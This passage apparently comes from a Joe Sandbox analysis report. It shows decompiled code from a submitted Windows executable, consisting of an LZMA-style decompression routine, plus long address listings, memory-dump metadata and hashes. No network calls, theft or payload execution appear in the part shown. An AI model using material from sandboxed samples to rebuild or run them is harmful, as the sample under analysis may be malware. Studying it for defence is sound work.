														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                  0x00000000
                                  0x00406e9d
                                  0x00406e9d
                                  0x00406ea1
                                  0x00406ec2
                                  0x00406ec9
                                  0x00406ecf
                                  0x00406ed5
                                  0x00406ee7
                                  0x00406eed
                                  0x00406ef2
                                  0x00000000
                                  0x00406ea3
                                  0x00406ea9
                                  0x0040726a
                                  0x0040726a
                                  0x0040726a
                                  0x0040726d
                                  0x0040726d
                                  0x0040726d
                                  0x00407273
                                  0x00407279
                                  0x0040727f
                                  0x00407299
                                  0x0040729c
                                  0x004072a2
                                  0x004072ad
                                  0x004072af
                                  0x00407281
                                  0x00407281
                                  0x00407290
                                  0x00407294
                                  0x00407294
                                  0x004072b9
                                  0x00000000
                                  0x00000000
                                  0x004072bb
                                  0x004072bf
                                  0x0040746e
                                  0x00407484
                                  0x0040748c
                                  0x00407493
                                  0x00407495
                                  0x0040749c
                                  0x004074a0
                                  0x004074a0
                                  0x004072cb
                                  0x004072d2
                                  0x004072da
                                  0x004072dd
                                  0x004072e0
                                  0x004072e0
                                  0x004072e6
                                  0x004072e6
                                  0x00406a82
                                  0x00406a82
                                  0x00406a82
                                  0x00406a8b
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00000000
                                  0x00406a9c
                                  0x00000000
                                  0x00000000
                                  0x00406aa5
                                  0x00406aa8
                                  0x00406aab
                                  0x00406aaf
                                  0x00000000
                                  0x00000000
                                  0x00406ab5
                                  0x00406ab8
                                  0x00406aba
                                  0x00406abb
                                  0x00406abe
                                  0x00406ac0
                                  0x00406ac1
                                  0x00406ac3
                                  0x00406ac6
                                  0x00406acb
                                  0x00406ad0
                                  0x00406ad9
                                  0x00406aec
                                  0x00406aef
                                  0x00406afb
                                  0x00406b23
                                  0x00406b25
                                  0x00406b33
                                  0x00406b33
                                  0x00406b37
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406b27
                                  0x00406b27
                                  0x00406b2a
                                  0x00406b2b
                                  0x00406b2b
                                  0x00000000
                                  0x00406b27
                                  0x00406b01
                                  0x00406b06
                                  0x00406b06
                                  0x00406b0f
                                  0x00406b17
                                  0x00406b1a
                                  0x00000000
                                  0x00406b20
                                  0x00406b20
                                  0x00000000
                                  0x00406b20
                                  0x00000000
                                  0x00406b3d
                                  0x00406b3d
                                  0x00406b41
                                  0x004073ed
                                  0x00000000
                                  0x004073ed
                                  0x00406b4a
                                  0x00406b5a
                                  0x00406b5d
                                  0x00406b60
                                  0x00406b60
                                  0x00406b60
                                  0x00406b63
                                  0x00406b67
                                  0x00000000
                                  0x00000000
                                  0x00406b69
                                  0x00406b6f
                                  0x00406b99
                                  0x00406b9f
                                  0x00406ba6
                                  0x00000000
                                  0x00406ba6
                                  0x00406b75
                                  0x00406b78
                                  0x00406b7d
                                  0x00406b7d
                                  0x00406b88
                                  0x00406b90
                                  0x00406b93
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406bd8
                                  0x00406bde
                                  0x00406be1
                                  0x00406bee
                                  0x00406bf6
                                  0x00000000
                                  0x00000000
                                  0x00406bad
                                  0x00406bad
                                  0x00406bb1
                                  0x004073fc
                                  0x00000000
                                  0x004073fc
                                  0x00406bbd
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bcb
                                  0x00406bce
                                  0x00406bd1
                                  0x00406bd6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040726d
                                  0x0040726d
                                  0x00407273
                                  0x00407279
                                  0x0040727f
                                  0x00407299
                                  0x0040729c
                                  0x004072a2
                                  0x004072ad
                                  0x004072af
                                  0x00407281
                                  0x00407281
                                  0x00407290
                                  0x00407294
                                  0x00407294
                                  0x004072b9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406bfe
                                  0x00406c00
                                  0x00406c03
                                  0x00406c74
                                  0x00406c77
                                  0x00406c7a
                                  0x00406c81
                                  0x00406c8b
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x00406c05
                                  0x00406c09
                                  0x00406c0c
                                  0x00406c0e
                                  0x00406c11
                                  0x00406c14
                                  0x00406c16
                                  0x00406c19
                                  0x00406c1b
                                  0x00406c20
                                  0x00406c23
                                  0x00406c26
                                  0x00406c2a
                                  0x00406c31
                                  0x00406c34
                                  0x00406c3b
                                  0x00406c3f
                                  0x00406c47
                                  0x00406c47
                                  0x00406c47
                                  0x00406c41
                                  0x00406c41
                                  0x00406c41
                                  0x00406c36
                                  0x00406c36
                                  0x00406c36
                                  0x00406c4b
                                  0x00406c4e
                                  0x00406c6c
                                  0x00406c6e
                                  0x00000000
                                  0x00406c50
                                  0x00406c50
                                  0x00406c53
                                  0x00406c56
                                  0x00406c59
                                  0x00406c5b
                                  0x00406c5b
                                  0x00406c5b
                                  0x00406c5e
                                  0x00406c61
                                  0x00406c63
                                  0x00406c64
                                  0x00406c67
                                  0x00000000
                                  0x00406c67
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406f07
                                  0x00406f0b
                                  0x00406f2e
                                  0x00406f31
                                  0x00406f34
                                  0x00406f3e
                                  0x00406f0d
                                  0x00406f0d
                                  0x00406f10
                                  0x00406f13
                                  0x00406f16
                                  0x00406f23
                                  0x00406f26
                                  0x00406f26
                                  0x0040726a
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x00000000
                                  0x00406f4a
                                  0x00406f4e
                                  0x00000000
                                  0x00000000
                                  0x00406f54
                                  0x00406f58
                                  0x00000000
                                  0x00000000
                                  0x00406f5e
                                  0x00406f60
                                  0x00406f64
                                  0x00406f64
                                  0x00406f67
                                  0x00406f6b
                                  0x00000000
                                  0x00000000
                                  0x00406fbb
                                  0x00406fbf
                                  0x00406fc6
                                  0x00406fc9
                                  0x00406fcc
                                  0x00406fd6
                                  0x0040726a
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x0040726a
                                  0x00406fc1
                                  0x00000000
                                  0x00000000
                                  0x00406fe2
                                  0x00406fe6
                                  0x00406fed
                                  0x00406ff0
                                  0x00406ff3
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406ff6
                                  0x00406ff9
                                  0x00406ffc
                                  0x00406ffc
                                  0x00406fff
                                  0x00407002
                                  0x00407005
                                  0x00407005
                                  0x00407008
                                  0x0040700f
                                  0x00407014
                                  0x00000000
                                  0x00000000
                                  0x004070a2
                                  0x004070a2
                                  0x004070a6
                                  0x00407444
                                  0x00000000
                                  0x00407444
                                  0x004070ac
                                  0x004070af
                                  0x004070b2
                                  0x004070b6
                                  0x004070b9
                                  0x004070bf
                                  0x004070c1
                                  0x004070c1
                                  0x004070c1
                                  0x004070c4
                                  0x004070c7
                                  0x00000000
                                  0x00000000
                                  0x00406c97
                                  0x00406c97
                                  0x00406c9b
                                  0x00407408
                                  0x00000000
                                  0x00407408
                                  0x00406ca1
                                  0x00406ca4
                                  0x00406ca7
                                  0x00406cab
                                  0x00406cae
                                  0x00406cb4
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb9
                                  0x00406cbc
                                  0x00406cbc
                                  0x00406cbf
                                  0x00406cc2
                                  0x00000000
                                  0x00000000
                                  0x00406cc8
                                  0x00406cce
                                  0x00000000
                                  0x00000000
                                  0x00406cd4
                                  0x00406cd4
                                  0x00406cd8
                                  0x00406cdb
                                  0x00406cde
                                  0x00406ce1
                                  0x00406ce4
                                  0x00406ce5
                                  0x00406ce8
                                  0x00406cea
                                  0x00406cf0
                                  0x00406cf3
                                  0x00406cf6
                                  0x00406cf9
                                  0x00406cfc
                                  0x00406cff
                                  0x00406d02
                                  0x00406d1e
                                  0x00406d21
                                  0x00406d24
                                  0x00406d27
                                  0x00406d2e
                                  0x00406d32
                                  0x00406d34
                                  0x00406d38
                                  0x00406d04
                                  0x00406d04
                                  0x00406d08
                                  0x00406d10
                                  0x00406d15
                                  0x00406d17
                                  0x00406d19
                                  0x00406d19
                                  0x00406d3b
                                  0x00406d42
                                  0x00406d45
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d50
                                  0x00406d50
                                  0x00406d54
                                  0x00407414
                                  0x00000000
                                  0x00407414
                                  0x00406d5a
                                  0x00406d5d
                                  0x00406d60
                                  0x00406d64
                                  0x00406d67
                                  0x00406d6d
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d72
                                  0x00406d75
                                  0x00406d75
                                  0x00406d75
                                  0x00406d7b
                                  0x00000000
                                  0x00000000
                                  0x00406d7d
                                  0x00406d80
                                  0x00406d83
                                  0x00406d86
                                  0x00406d89
                                  0x00406d8c
                                  0x00406d8f
                                  0x00406d92
                                  0x00406d95
                                  0x00406d98
                                  0x00406d9b
                                  0x00406db3
                                  0x00406db6
                                  0x00406db9
                                  0x00406dbc
                                  0x00406dbc
                                  0x00406dbf
                                  0x00406dc3
                                  0x00406dc5
                                  0x00406d9d
                                  0x00406d9d
                                  0x00406da5
                                  0x00406daa
                                  0x00406dac
                                  0x00406dae
                                  0x00406dae
                                  0x00406dc8
                                  0x00406dcf
                                  0x00406dd2
                                  0x00000000
                                  0x00406dd4
                                  0x00000000
                                  0x00406dd4
                                  0x00406dd2
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00000000
                                  0x00000000
                                  0x00406e14
                                  0x00406e14
                                  0x00406e18
                                  0x00407420
                                  0x00000000
                                  0x00407420
                                  0x00406e1e
                                  0x00406e21
                                  0x00406e24
                                  0x00406e28
                                  0x00406e2b
                                  0x00406e31
                                  0x00406e33
                                  0x00406e33
                                  0x00406e33
                                  0x00406e36
                                  0x00406e39
                                  0x00406e39
                                  0x00406e3f
                                  0x00406ddd
                                  0x00406ddd
                                  0x00406de0
                                  0x00000000
                                  0x00406de0
                                  0x00406e41
                                  0x00406e41
                                  0x00406e44
                                  0x00406e47
                                  0x00406e4a
                                  0x00406e4d
                                  0x00406e50
                                  0x00406e53
                                  0x00406e56
                                  0x00406e59
                                  0x00406e5c
                                  0x00406e5f
                                  0x00406e77
                                  0x00406e7a
                                  0x00406e7d
                                  0x00406e80
                                  0x00406e80
                                  0x00406e83
                                  0x00406e87
                                  0x00406e89
                                  0x00406e61
                                  0x00406e61
                                  0x00406e69
                                  0x00406e6e
                                  0x00406e70
                                  0x00406e72
                                  0x00406e72
                                  0x00406e8c
                                  0x00406e93
                                  0x00406e96
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00407125
                                  0x00407125
                                  0x00407129
                                  0x00407450
                                  0x00000000
                                  0x00407450
                                  0x0040712f
                                  0x00407132
                                  0x00407135
                                  0x00407139
                                  0x0040713c
                                  0x00407142
                                  0x00407144
                                  0x00407144
                                  0x00407144
                                  0x00407147
                                  0x00000000
                                  0x00000000
                                  0x00406ef5
                                  0x00406ef5
                                  0x00406ef8
                                  0x0040726a
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x00000000
                                  0x00407234
                                  0x00407238
                                  0x0040725a
                                  0x0040725d
                                  0x00407267
                                  0x0040726a
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x0040726a
                                  0x0040723a
                                  0x0040723d
                                  0x00407241
                                  0x00407244
                                  0x00407244
                                  0x00407247
                                  0x00000000
                                  0x00000000
                                  0x004072f1
                                  0x004072f5
                                  0x00407313
                                  0x00407313
                                  0x00407313
                                  0x0040731a
                                  0x00407321
                                  0x00407328
                                  0x00407328
                                  0x00000000
                                  0x00407328
                                  0x004072f7
                                  0x004072fa
                                  0x004072fd
                                  0x00407300
                                  0x00407307
                                  0x0040724b
                                  0x0040724b
                                  0x0040724e
                                  0x00000000
                                  0x00000000
                                  0x004073e2
                                  0x004073e5
                                  0x004072e6
                                  0x00000000
                                  0x00000000
                                  0x0040701c
                                  0x0040701e
                                  0x00407025
                                  0x00407026
                                  0x00407028
                                  0x0040702b
                                  0x00000000
                                  0x00000000
                                  0x00407033
                                  0x00407036
                                  0x00407039
                                  0x0040703b
                                  0x0040703d
                                  0x0040703d
                                  0x0040703e
                                  0x00407041
                                  0x00407048
                                  0x0040704b
                                  0x00407059
                                  0x00000000
                                  0x00000000
                                  0x0040732f
                                  0x0040732f
                                  0x00407332
                                  0x00407339
                                  0x00000000
                                  0x00000000
                                  0x0040733e
                                  0x0040733e
                                  0x00407342
                                  0x0040747a
                                  0x00000000
                                  0x0040747a
                                  0x00407348
                                  0x0040734b
                                  0x0040734e
                                  0x00407352
                                  0x00407355
                                  0x0040735b
                                  0x0040735d
                                  0x0040735d
                                  0x0040735d
                                  0x00407360
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407366
                                  0x00407366
                                  0x0040736a
                                  0x004073ca
                                  0x004073cd
                                  0x004073d2
                                  0x004073d3
                                  0x004073d5
                                  0x004073d7
                                  0x004073da
                                  0x004072e6
                                  0x004072e6
                                  0x00000000
                                  0x004072ec
                                  0x004072e6
                                  0x0040736c
                                  0x00407372
                                  0x00407375
                                  0x00407378
                                  0x0040737b
                                  0x0040737e
                                  0x00407381
                                  0x00407384
                                  0x00407387
                                  0x0040738a
                                  0x0040738d
                                  0x004073a6
                                  0x004073a9
                                  0x004073ac
                                  0x004073af
                                  0x004073b3
                                  0x004073b5
                                  0x004073b5
                                  0x004073b6
                                  0x004073b9
                                  0x0040738f
                                  0x0040738f
                                  0x00407397
                                  0x0040739c
                                  0x0040739e
                                  0x004073a1
                                  0x004073a1
                                  0x004073bc
                                  0x004073c3
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x00407061
                                  0x00407064
                                  0x0040709a
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071cd
                                  0x004071cd
                                  0x004071d0
                                  0x004071d2
                                  0x0040745c
                                  0x00000000
                                  0x0040745c
                                  0x004071d8
                                  0x004071db
                                  0x00000000
                                  0x00000000
                                  0x004071e1
                                  0x004071e5
                                  0x004071e8
                                  0x004071e8
                                  0x004071e8
                                  0x00000000
                                  0x004071e8
                                  0x00407066
                                  0x00407068
                                  0x0040706a
                                  0x0040706c
                                  0x0040706f
                                  0x00407070
                                  0x00407072
                                  0x00407074
                                  0x00407077
                                  0x0040707a
                                  0x00407090
                                  0x00407095
                                  0x004070cd
                                  0x004070cd
                                  0x004070d1
                                  0x004070fd
                                  0x004070ff
                                  0x00407106
                                  0x00407109
                                  0x0040710c
                                  0x0040710c
                                  0x00407111
                                  0x00407111
                                  0x00407113
                                  0x00407116
                                  0x0040711d
                                  0x00407120
                                  0x0040714d
                                  0x0040714d
                                  0x00407150
                                  0x00407153
                                  0x004071c7
                                  0x004071c7
                                  0x004071c7
                                  0x00000000
                                  0x004071c7
                                  0x00407155
                                  0x0040715b
                                  0x0040715e
                                  0x00407161
                                  0x00407164
                                  0x00407167
                                  0x0040716a
                                  0x0040716d
                                  0x00407170
                                  0x00407173
                                  0x00407176
                                  0x0040718f
                                  0x00407191
                                  0x00407194
                                  0x00407195
                                  0x00407198
                                  0x0040719a
                                  0x0040719d
                                  0x0040719f
                                  0x004071a1
                                  0x004071a4
                                  0x004071a6
                                  0x004071a9
                                  0x004071ad
                                  0x004071af
                                  0x004071af
                                  0x004071b0
                                  0x004071b3
                                  0x004071b6
                                  0x00407178
                                  0x00407178
                                  0x00407180
                                  0x00407185
                                  0x00407187
                                  0x0040718a
                                  0x0040718a
                                  0x004071b9
                                  0x004071c0
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x00000000
                                  0x004071c2
                                  0x00000000
                                  0x004071c2
                                  0x004071c0
                                  0x004070d3
                                  0x004070d6
                                  0x004070d8
                                  0x004070db
                                  0x004070de
                                  0x004070e1
                                  0x004070e3
                                  0x004070e6
                                  0x004070e9
                                  0x004070e9
                                  0x004070ec
                                  0x004070ec
                                  0x004070ef
                                  0x004070f6
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x00000000
                                  0x004070f8
                                  0x00000000
                                  0x004070f8
                                  0x004070f6
                                  0x0040707c
                                  0x0040707f
                                  0x00407081
                                  0x00407084
                                  0x00000000
                                  0x00000000
                                  0x00406de3
                                  0x00406de3
                                  0x00406de7
                                  0x0040742c
                                  0x00000000
                                  0x0040742c
                                  0x00406ded
                                  0x00406df0
                                  0x00406df3
                                  0x00406df6
                                  0x00406df9
                                  0x00406dfc
                                  0x00406dff
                                  0x00406e01
                                  0x00406e04
                                  0x00406e07
                                  0x00406e0a
                                  0x00406e0c
                                  0x00406e0c
                                  0x00406e0c
                                  0x00000000
                                  0x00000000
                                  0x00406f6e
                                  0x00406f6e
                                  0x00406f72
                                  0x00407438
                                  0x00000000
                                  0x00407438
                                  0x00406f78
                                  0x00406f7b
                                  0x00406f7e
                                  0x00406f81
                                  0x00406f83
                                  0x00406f83
                                  0x00406f83
                                  0x00406f86
                                  0x00406f89
                                  0x00406f8c
                                  0x00406f8f
                                  0x00406f92
                                  0x00406f95
                                  0x00406f96
                                  0x00406f98
                                  0x00406f98
                                  0x00406f98
                                  0x00406f9b
                                  0x00406f9e
                                  0x00406fa1
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa7
                                  0x00406fa9
                                  0x00406fa9
                                  0x00000000
                                  0x00000000
                                  0x004071eb
                                  0x004071eb
                                  0x004071eb
                                  0x004071ef
                                  0x00000000
                                  0x00000000
                                  0x004071f5
                                  0x004071f8
                                  0x004071fb
                                  0x004071fe
                                  0x00407200
                                  0x00407200
                                  0x00407200
                                  0x00407203
                                  0x00407206
                                  0x00407209
                                  0x0040720c
                                  0x0040720f
                                  0x00407212
                                  0x00407213
                                  0x00407215
                                  0x00407215
                                  0x00407215
                                  0x00407218
                                  0x0040721b
                                  0x0040721e
                                  0x00407221
                                  0x00407224
                                  0x00407228
                                  0x0040722a
                                  0x0040722d
                                  0x00000000
                                  0x0040722f
                                  0x00406fac
                                  0x00406fac
                                  0x00000000
                                  0x00406fac
                                  0x0040722d
                                  0x00407462
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00407499
                                  0x00407499
                                  0x00000000
                                  0x00407499
                                  0x004072e6
                                  0x0040726d
                                  0x0040726a
                                  0x00000000
                                  0x00406ea1

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                                  • Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
                                  • Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                                  • Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406FBB Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E00406FBB() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
